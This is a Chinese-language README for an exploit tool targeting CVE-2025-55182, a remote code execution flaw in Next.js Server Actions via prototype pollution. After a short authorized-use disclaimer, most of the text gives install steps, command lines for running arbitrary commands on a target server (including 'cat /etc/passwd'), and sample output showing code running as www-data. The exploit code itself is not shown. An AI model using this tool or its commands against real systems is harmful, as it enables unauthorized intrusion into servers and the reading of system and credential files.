[!CAUTION]
⚠️ 免责声明 - 使用前必读
本工具仅供以下用途使用:
- 安全研究人员进行漏洞验证
- 获得明确授权的渗透测试
- 教育和学习目的
未经授权访问计算机系统是违法行为!
使用本工具即表示您同意:
- 在测试任何系统之前已获得适当授权
- 不会将本工具用于恶意目的
- 您对自己的行为及其后果承担全部责任
作者对本工具的滥用不承担任何法律责任。
Next.js 服务端原型污染导致的远程代码执行漏洞利用工具。
CVE-2025-55182 是一个影响 Next.js 的严重安全漏洞,攻击者可以通过精心构造的请求,利用原型污染实现远程代码执行 (RCE)。
📖 详细技术分析请参阅 EXPLOIT.md
该漏洞利用 Next.js Server Actions 的请求处理机制,通过 __proto__ 原型链污染,结合 Function 构造函数实现任意代码执行。
# 使用 yarn
yarn install
# 使用 npm
npm install
# 基本用法
node index.js <目标URL> [命令]
# 示例
node index.js http://localhost:3000
node index.js http://localhost:3000 "ls -la"
node index.js http://localhost:3000 "cat /etc/passwd"
# 运行工具
yarn start http://localhost:3000 "whoami"
# 或使用别名
yarn exploit http://localhost:3000 "ls -la"
# 查看帮助
yarn help
# 链接到全局
yarn link
# 或
npm link
# 然后可以直接使用命令
cve-2025-55182 http://localhost:3000
cve-2025-55182 http://localhost:3000 "whoami"
# 取消链接
yarn unlink
Usage:
cve-2025-55182 <url> [command]
Arguments:
url 目标 URL (必需)
command 要执行的命令 (默认: whoami)
Options:
-h, --help 显示帮助信息
-v, --version 显示版本号
工具输出 JSON 格式的结果:
{
"success": true,
"message": "",
"data": "命令执行结果"
}
{
"success": false,
"message": "错误信息",
"data": null
}
$ cve-2025-55182 http://vulnerable-site.com "id"
{
"success": true,
"message": "",
"data": "uid=1000(www-data) gid=1000(www-data) groups=1000(www-data)"
}